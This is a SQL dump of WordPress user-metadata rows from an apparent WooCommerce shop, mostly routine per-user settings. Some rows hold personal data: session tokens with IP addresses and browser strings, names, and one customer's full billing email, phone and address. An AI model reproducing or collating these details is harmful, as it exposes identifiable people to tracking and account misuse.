INSERT INTO `wp_usermeta` VALUES (17280, 1146, 'session_tokens', 'a:1:{s:64:"4fe82d2f613e118529f31b2217238ae77d4b5f67e1321b8a86087f270a325b07";a:4:{s:10:"expiration";i:1497272087;s:2:"ip";s:13:"201.241.244.7";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";s:5:"login";i:1496062487;}}'); 
INSERT INTO `wp_usermeta` VALUES (17281, 1147, 'nickname', 'debbie'); 
INSERT INTO `wp_usermeta` VALUES (17282, 1147, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17283, 1147, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17284, 1147, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17285, 1147, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17286, 1147, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17287, 1147, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17288, 1147, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17289, 1147, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17290, 1147, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17291, 1147, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17292, 1147, '_yoast_wpseo_profile_updated', '1496065329'); 
INSERT INTO `wp_usermeta` VALUES (17293, 1147, 'session_tokens', 'a:1:{s:64:"e695faa395cf75f2f5426abde4909ceab1e1c41b66333b0bd8f6f960d001dcfa";a:4:{s:10:"expiration";i:1497274938;s:2:"ip";s:11:"24.94.56.31";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496065338;}}'); 
INSERT INTO `wp_usermeta` VALUES (17294, 1148, 'nickname', 'john.coulter'); 
INSERT INTO `wp_usermeta` VALUES (17295, 1148, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17296, 1148, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17297, 1148, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17298, 1148, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17299, 1148, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17300, 1148, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17301, 1148, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17302, 1148, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17303, 1148, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17304, 1148, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17305, 1148, '_yoast_wpseo_profile_updated', '1496071665'); 
INSERT INTO `wp_usermeta` VALUES (17306, 1148, 'session_tokens', 'a:1:{s:64:"de092aa10f49e14e5427ab995c213583e1690b9b0a2a8a7511e52f9a8f179a57";a:4:{s:10:"expiration";i:1497281276;s:2:"ip";s:14:"206.126.63.163";s:2:"ua";s:71:"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)";s:5:"login";i:1496071676;}}'); 
INSERT INTO `wp_usermeta` VALUES (17307, 1149, 'nickname', 'jhadley'); 
INSERT INTO `wp_usermeta` VALUES (17308, 1149, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17309, 1149, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17310, 1149, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17311, 1149, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17312, 1149, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17313, 1149, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17314, 1149, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17315, 1149, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17316, 1149, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17317, 1149, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17318, 1149, '_yoast_wpseo_profile_updated', '1496074992'); 
INSERT INTO `wp_usermeta` VALUES (17319, 1149, 'session_tokens', 'a:1:{s:64:"95a85f0cc7838ff1e55300c1750aeb660c4493f05d73461e6f2832a1d734c23c";a:4:{s:10:"expiration";i:1497284603;s:2:"ip";s:12:"153.2.246.37";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496075003;}}'); 
INSERT INTO `wp_usermeta` VALUES (17320, 1150, 'nickname', 'kacycouchman1999'); 
INSERT INTO `wp_usermeta` VALUES (17321, 1150, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17322, 1150, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17323, 1150, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17324, 1150, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17325, 1150, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17326, 1150, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17327, 1150, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17328, 1150, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17329, 1150, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17330, 1150, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17331, 1150, '_yoast_wpseo_profile_updated', '1496080606'); 
INSERT INTO `wp_usermeta` VALUES (17332, 1150, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (17333, 1151, 'nickname', 'jesse.casiano'); 
INSERT INTO `wp_usermeta` VALUES (17334, 1151, 'first_name', 'Jesse'); 
INSERT INTO `wp_usermeta` VALUES (17335, 1151, 'last_name', 'Casiano'); 
INSERT INTO `wp_usermeta` VALUES (17336, 1151, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17337, 1151, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17338, 1151, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17339, 1151, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17340, 1151, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17341, 1151, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17342, 1151, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17343, 1151, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17344, 1151, '_yoast_wpseo_profile_updated', '1496092530'); 
INSERT INTO `wp_usermeta` VALUES (17345, 1151, 'session_tokens', 'a:1:{s:64:"9589d43d6c365e17cd00fa42937aee149158da9cfdd56607dd754666ec6ca7e6";a:4:{s:10:"expiration";i:1497302138;s:2:"ip";s:14:"155.148.13.221";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496092538;}}'); 
INSERT INTO `wp_usermeta` VALUES (17346, 1151, 'last_update', '1496092558'); 
INSERT INTO `wp_usermeta` VALUES (17347, 1152, 'nickname', 'janicetaube1956'); 
INSERT INTO `wp_usermeta` VALUES (17348, 1152, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17349, 1152, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17350, 1152, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17351, 1152, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17352, 1152, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17353, 1152, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17354, 1152, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17355, 1152, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17356, 1152, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17357, 1152, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17358, 1152, '_yoast_wpseo_profile_updated', '1496143602'); 
INSERT INTO `wp_usermeta` VALUES (17359, 1152, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (17360, 1153, 'nickname', 'jgates'); 
INSERT INTO `wp_usermeta` VALUES (17361, 1153, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17362, 1153, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17363, 1153, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17364, 1153, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17365, 1153, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17366, 1153, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17367, 1153, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17368, 1153, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17369, 1153, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17370, 1153, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17371, 1153, '_yoast_wpseo_profile_updated', '1496163925'); 
INSERT INTO `wp_usermeta` VALUES (17372, 1153, 'session_tokens', 'a:1:{s:64:"8fd2e58399f2545b795476deb83bb7edc7a62b2e5aea9f9c7cb65e3eddd73e6e";a:4:{s:10:"expiration";i:1502047266;s:2:"ip";s:11:"50.32.78.38";s:2:"ua";s:129:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063";s:5:"login";i:1501874466;}}'); 
INSERT INTO `wp_usermeta` VALUES (17373, 1154, 'nickname', 'nanafraser1989'); 
INSERT INTO `wp_usermeta` VALUES (17374, 1154, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17375, 1154, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17376, 1154, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17377, 1154, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17378, 1154, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17379, 1154, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17380, 1154, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17381, 1154, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17382, 1154, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17383, 1154, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17384, 1154, '_yoast_wpseo_profile_updated', '1496167675'); 
INSERT INTO `wp_usermeta` VALUES (17385, 1154, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (17386, 1155, 'nickname', 'DANIEL.THOMPSON1.CTR'); 
INSERT INTO `wp_usermeta` VALUES (17387, 1155, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17388, 1155, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17389, 1155, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17390, 1155, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17391, 1155, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17392, 1155, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17393, 1155, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17394, 1155, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17395, 1155, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17396, 1155, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17397, 1155, '_yoast_wpseo_profile_updated', '1496167678'); 
INSERT INTO `wp_usermeta` VALUES (17398, 1155, 'session_tokens', 'a:2:{s:64:"2cd7809c7125723f5d12a602792dc927f24d59e1572f4175f425f19d1b97896c";a:4:{s:10:"expiration";i:1497377286;s:2:"ip";s:12:"138.162.0.43";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496167686;}s:64:"c51374dc29b20883a8a30eb0f81669003bb0ea63e11baf1ae7207ec2ad847f2b";a:4:{s:10:"expiration";i:1496340550;s:2:"ip";s:12:"138.162.0.43";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496167750;}}'); 
INSERT INTO `wp_usermeta` VALUES (17399, 1156, 'nickname', 'yegeun.song-spivey'); 
INSERT INTO `wp_usermeta` VALUES (17400, 1156, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17401, 1156, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17402, 1156, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17403, 1156, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17404, 1156, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17405, 1156, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17406, 1156, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17407, 1156, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17408, 1156, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17409, 1156, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17410, 1156, '_yoast_wpseo_profile_updated', '1496177254'); 
INSERT INTO `wp_usermeta` VALUES (17411, 1156, 'session_tokens', 'a:1:{s:64:"38634eed080a8ab55db27794529b35b68d503746e362de788cb16be39156a03b";a:4:{s:10:"expiration";i:1497386864;s:2:"ip";s:14:"199.107.68.203";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496177264;}}'); 
INSERT INTO `wp_usermeta` VALUES (17412, 1157, 'nickname', 'mhtdot1953'); 
INSERT INTO `wp_usermeta` VALUES (17413, 1157, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17414, 1157, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17415, 1157, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17416, 1157, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17417, 1157, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17418, 1157, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17419, 1157, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17420, 1157, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17421, 1157, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17422, 1157, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17423, 1157, '_yoast_wpseo_profile_updated', '1496189653'); 
INSERT INTO `wp_usermeta` VALUES (17424, 1157, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (17425, 1158, 'nickname', 'chaipat'); 
INSERT INTO `wp_usermeta` VALUES (17426, 1158, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17427, 1158, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17428, 1158, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17429, 1158, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17430, 1158, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17431, 1158, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17432, 1158, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17433, 1158, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17434, 1158, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17435, 1158, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17436, 1158, '_yoast_wpseo_profile_updated', '1496212906'); 
INSERT INTO `wp_usermeta` VALUES (17437, 1158, 'session_tokens', 'a:1:{s:64:"ebcf9cb5100633288d0a4ee7b869ef0f3e01eaa6cad4bc933250e4e283c17a42";a:4:{s:10:"expiration";i:1497422517;s:2:"ip";s:14:"134.196.237.30";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496212917;}}'); 
INSERT INTO `wp_usermeta` VALUES (17438, 1159, 'nickname', 'jamesgault111991'); 
INSERT INTO `wp_usermeta` VALUES (17439, 1159, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17440, 1159, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17441, 1159, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17442, 1159, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17443, 1159, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17444, 1159, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17445, 1159, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17446, 1159, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17447, 1159, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17448, 1159, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17449, 1159, '_yoast_wpseo_profile_updated', '1496218658'); 
INSERT INTO `wp_usermeta` VALUES (17450, 1159, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (17451, 1160, 'nickname', 'clarabel11111973'); 
INSERT INTO `wp_usermeta` VALUES (17452, 1160, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17453, 1160, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17454, 1160, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17455, 1160, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17456, 1160, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17457, 1160, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17458, 1160, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17459, 1160, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17460, 1160, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17461, 1160, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17462, 1160, '_yoast_wpseo_profile_updated', '1496218838'); 
INSERT INTO `wp_usermeta` VALUES (17463, 1160, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (17464, 1161, 'nickname', 'james.corcoranjr'); 
INSERT INTO `wp_usermeta` VALUES (17465, 1161, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17466, 1161, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17467, 1161, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17468, 1161, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17469, 1161, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17470, 1161, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17471, 1161, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17472, 1161, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17473, 1161, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17474, 1161, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17475, 1161, '_yoast_wpseo_profile_updated', '1496225616'); 
INSERT INTO `wp_usermeta` VALUES (17476, 1161, 'session_tokens', 'a:1:{s:64:"d93e25cc3d1db13cfac59e88faf9bc8f9b3a5d10e735961701e94f57254d3d56";a:4:{s:10:"expiration";i:1497435225;s:2:"ip";s:14:"65.222.251.100";s:2:"ua";s:66:"Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1496225625;}}'); 
INSERT INTO `wp_usermeta` VALUES (17477, 1162, 'nickname', 'boris.hagemann'); 
INSERT INTO `wp_usermeta` VALUES (17478, 1162, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17479, 1162, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17480, 1162, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17481, 1162, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17482, 1162, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17483, 1162, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17484, 1162, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17485, 1162, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17486, 1162, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17487, 1162, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17488, 1162, '_yoast_wpseo_profile_updated', '1496226692'); 
INSERT INTO `wp_usermeta` VALUES (17489, 1162, 'session_tokens', 'a:1:{s:64:"d7e9878b879b34953eabaf6b85e01639c077b962e1c168f670b1303ab46ee663";a:4:{s:10:"expiration";i:1497436302;s:2:"ip";s:12:"192.249.36.3";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496226702;}}'); 
INSERT INTO `wp_usermeta` VALUES (17490, 1162, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (17491, 1163, 'nickname', 'patrick.foster'); 
INSERT INTO `wp_usermeta` VALUES (17492, 1163, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17493, 1163, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17494, 1163, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17495, 1163, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17496, 1163, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17497, 1163, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17498, 1163, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17499, 1163, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17500, 1163, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17501, 1163, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17502, 1163, '_yoast_wpseo_profile_updated', '1496236503'); 
INSERT INTO `wp_usermeta` VALUES (17503, 1163, 'session_tokens', 'a:3:{s:64:"e2912ef47e2623184a34e8fb76d9e768be6ea457cc59eef43cd540d8104cc5c4";a:4:{s:10:"expiration";i:1497446113;s:2:"ip";s:14:"70.184.170.184";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496236513;}s:64:"76a3d0ad27b3e325b2bffeb681f8a130b0947bdc992b9fcf0f7ca856e3d3c8d5";a:4:{s:10:"expiration";i:1497011754;s:2:"ip";s:14:"70.184.170.184";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496838954;}s:64:"8600d5a3dec4bd8b97b569683827e87b4fec8da7ced000012e7b305260271b28";a:4:{s:10:"expiration";i:1497096514;s:2:"ip";s:14:"70.184.170.184";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496923714;}}'); 
INSERT INTO `wp_usermeta` VALUES (17504, 1163, 'billing_first_name', 'Patrick'); 
INSERT INTO `wp_usermeta` VALUES (17505, 1163, 'billing_last_name', 'Foster'); 
INSERT INTO `wp_usermeta` VALUES (17506, 1163, 'billing_company', 'Cubic Global Defense'); 
INSERT INTO `wp_usermeta` VALUES (17507, 1163, 'billing_email', 'patrick.foster@cubic.com'); 
INSERT INTO `wp_usermeta` VALUES (17508, 1163, 'billing_phone', '757-425-0142'); 
INSERT INTO `wp_usermeta` VALUES (17509, 1163, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (17510, 1163, 'billing_address_1', '803 F Ave. Building 140 NAS Oceana'); 
INSERT INTO `wp_usermeta` VALUES (17511, 1163, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (17512, 1163, 'billing_city', 'Virginia Beach'); 
INSERT INTO `wp_usermeta` VALUES (17513, 1163, 'billing_state', 'VA'); 
INSERT INTO `wp_usermeta` VALUES (17514, 1163, 'billing_postcode', '23460'); 
INSERT INTO `wp_usermeta` VALUES (17515, 1163, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (17516, 1164, 'nickname', 'abe'); 
INSERT INTO `wp_usermeta` VALUES (17517, 1164, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17518, 1164, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17519, 1164, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17520, 1164, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17521, 1164, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17522, 1164, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17523, 1164, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17524, 1164, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17525, 1164, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17526, 1164, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17527, 1164, '_yoast_wpseo_profile_updated', '1496237949'); 
INSERT INTO `wp_usermeta` VALUES (17528, 1164, 'session_tokens', 'a:1:{s:64:"1011c8abd99c8a0751030e673275911278b7a405d3a8d78a03bfc30c7cab7622";a:4:{s:10:"expiration";i:1497447564;s:2:"ip";s:13:"99.164.137.89";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496237964;}}'); 
INSERT INTO `wp_usermeta` VALUES (17529, 1164, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (17530, 1165, 'nickname', 'michael.kelleher'); 
INSERT INTO `wp_usermeta` VALUES (17531, 1165, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17532, 1165, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (17533, 1165, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (17534, 1165, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17535, 1165, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (17536, 1165, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (17537, 1165, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (17538, 1165, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (17539, 1165, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (17540, 1165, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (17541, 1165, '_yoast_wpseo_profile_updated', '1496249971'); 
